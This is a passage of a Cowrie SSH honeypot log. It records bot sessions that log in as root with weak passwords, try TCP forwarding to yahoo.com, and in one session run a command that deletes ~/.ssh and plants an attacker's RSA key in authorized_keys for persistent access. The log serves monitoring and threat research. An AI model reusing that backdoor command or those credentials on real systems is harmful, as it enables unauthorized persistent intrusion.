cdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.855876Z","src_ip":"213.209.150.239","session":"7ff1ca178c65"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.091763Z","src_ip":"213.209.150.239","session":"7ff1ca178c65"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":5080,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:5080","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.139821Z","session":"7ff1ca178c65"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.187027Z","src_ip":"213.209.150.239","session":"7ff1ca178c65"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin2020!","message":"login attempt [root/Admin2020!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.307813Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":10328,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10328","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.321439Z","session":"7ff1ca178c65"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.368633Z","src_ip":"213.209.150.239","session":"7ff1ca178c65"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.416385Z","src_ip":"213.209.150.239","session":"7ff1ca178c65"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51454,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d4fd3553a1d","protocol":"ssh","message":"New connection: 213.209.150.239:51454 (1.2.3.4:22) [session: 2d4fd3553a1d]","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.462635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.464053Z","src_ip":"213.209.150.239","session":"2d4fd3553a1d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.511435Z","src_ip":"213.209.150.239","session":"2d4fd3553a1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:55:15.772588Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.773299Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.774199Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.822949Z","src_ip":"213.209.150.239","session":"2d4fd3553a1d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":28591,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28591","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.870943Z","session":"2d4fd3553a1d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.920595Z","src_ip":"213.209.150.239","session":"2d4fd3553a1d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:15.965744Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19421,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19421","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.061703Z","session":"2d4fd3553a1d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.109347Z","src_ip":"213.209.150.239","session":"2d4fd3553a1d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.157089Z","src_ip":"213.209.150.239","session":"2d4fd3553a1d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51508,"dst_ip":"1.2.3.4","dst_port":22,"session":"e830e99b0604","protocol":"ssh","message":"New connection: 213.209.150.239:51508 (1.2.3.4:22) [session: e830e99b0604]","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.212794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.213430Z","src_ip":"213.209.150.239","session":"e830e99b0604"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.270134Z","src_ip":"213.209.150.239","session":"e830e99b0604"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:55:16.366881Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.367727Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.552710Z","src_ip":"213.209.150.239","session":"e830e99b0604"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.561701Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.562707Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11542,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11542","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.610761Z","session":"e830e99b0604"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.667691Z","src_ip":"213.209.150.239","session":"e830e99b0604"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":49348,"dst_ip":"1.2.3.4","dst_port":22,"session":"da0841c44da1","protocol":"ssh","message":"New connection: 36.89.28.139:49348 (1.2.3.4:22) [session: da0841c44da1]","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.759679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.760543Z","src_ip":"36.89.28.139","session":"da0841c44da1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":5379,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:5379","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.822940Z","session":"e830e99b0604"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.879692Z","src_ip":"213.209.150.239","session":"e830e99b0604"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.937105Z","src_ip":"213.209.150.239","session":"e830e99b0604"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.956983Z","src_ip":"36.89.28.139","session":"da0841c44da1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51554,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e30aa8e68c2","protocol":"ssh","message":"New connection: 213.209.150.239:51554 (1.2.3.4:22) [session: 5e30aa8e68c2]","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.983314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:16.984075Z","src_ip":"213.209.150.239","session":"5e30aa8e68c2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.031006Z","src_ip":"213.209.150.239","session":"5e30aa8e68c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.265363Z","src_ip":"213.209.150.239","session":"5e30aa8e68c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16641,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16641","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.313439Z","session":"5e30aa8e68c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.360784Z","src_ip":"213.209.150.239","session":"5e30aa8e68c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":7020,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7020","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.497466Z","session":"5e30aa8e68c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.544720Z","src_ip":"213.209.150.239","session":"5e30aa8e68c2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.592627Z","src_ip":"213.209.150.239","session":"5e30aa8e68c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51601,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bfb94d3efe1","protocol":"ssh","message":"New connection: 213.209.150.239:51601 (1.2.3.4:22) [session: 1bfb94d3efe1]","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.648574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:17.649425Z","src_ip":"213.209.150.239","session":"1bfb94d3efe1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm